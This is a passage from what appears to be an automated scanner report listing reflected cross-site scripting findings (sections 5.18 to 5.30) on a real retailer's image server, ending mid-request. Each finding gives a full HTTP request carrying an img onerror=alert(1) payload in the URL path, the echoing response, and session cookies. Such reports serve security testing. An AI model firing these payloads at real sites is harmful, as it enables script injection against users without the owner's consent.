The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae was submitted in the REST URL parameter 4. This input was echoed as be627<img src=a onerror=alert(1)>d5f2efe08ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_301be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/detailLogo_301be627<img src=a onerror=alert(1)>d5f2efe08ae

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2 was submitted in the REST URL parameter 4. This input was echoed as d8821<img src=a onerror=alert(1)>953892990d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_391d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:09 GMT
Connection: close

Unable to find /pacsun/detailLogo_391d8821<img src=a onerror=alert(1)>953892990d2

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25 was submitted in the REST URL parameter 4. This input was echoed as 1b809<img src=a onerror=alert(1)>7f5d0e54d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/headerEmailV3_envelope1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:30 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope1b809<img src=a onerror=alert(1)>7f5d0e54d25

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/homePromo1_051211

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba was submitted in the REST URL parameter 4. This input was echoed as 70522<img src=a onerror=alert(1)>1618e1c19ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homePromo1_05121170522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:03 GMT
Connection: close

Unable to find /pacsun/homePromo1_05121170522<img src=a onerror=alert(1)>1618e1c19ba

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/homePromo2_051311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba was submitted in the REST URL parameter 4. This input was echoed as 1f149<img src=a onerror=alert(1)>9fdfccbd9ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homePromo2_0513111f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/homePromo2_0513111f149<img src=a onerror=alert(1)>9fdfccbd9ba

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981 was submitted in the REST URL parameter 4. This input was echoed as b5c82<img src=a onerror=alert(1)>685bea3b981 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/logo_v3b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:29 GMT
Connection: close

Unable to find /pacsun/logo_v3b5c82<img src=a onerror=alert(1)>685bea3b981

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1 was submitted in the REST URL parameter 4. This input was echoed as abe3a<img src=a onerror=alert(1)>af65108d6c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offabe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offabe3a<img src=a onerror=alert(1)>af65108d6c1

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3 was submitted in the REST URL parameter 4. This input was echoed as a896f<img src=a onerror=alert(1)>e95d4b07ad3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_brands3Offa896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:49 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Offa896f<img src=a onerror=alert(1)>e95d4b07ad3

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_collective3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e was submitted in the REST URL parameter 4. This input was echoed as 9308e<img src=a onerror=alert(1)>4e797c2cb8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_collective3Off9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:09 GMT
Connection: close

Unable to find /pacsun/mainNav2_collective3Off9308e<img src=a onerror=alert(1)>4e797c2cb8e

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35 was submitted in the REST URL parameter 4. This input was echoed as 215c2<img src=a onerror=alert(1)>dc39dea2f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_mens3Off215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off215c2<img src=a onerror=alert(1)>dc39dea2f35

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33 was submitted in the REST URL parameter 4. This input was echoed as 1312d<img src=a onerror=alert(1)>4d44989ac33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_sale3Off1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:42 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off1312d<img src=a onerror=alert(1)>4d44989ac33

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9 was submitted in the REST URL parameter 4. This input was echoed as 70c59<img src=a onerror=alert(1)>6492a3bd5c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_shoes3Off70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:31 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Off70c59<img src=a onerror=alert(1)>6492a3bd5c9

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_surf3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce was submitted in the REST URL parameter 4. This input was echoed as ae557<img src=a onerror=alert(1)>aec779990ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_surf3Offae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:25 GMT
Connection: close

Unable to find /pacsun/mainNav2_surf3Offae557<img src=a onerror=alert(1)>aec779990ce

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_swim3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec was submitted in the REST URL parameter 4. This input was echoed as c95c0<img src=a onerror=alert(1)>8c10e31f2ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_swim3Offc95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
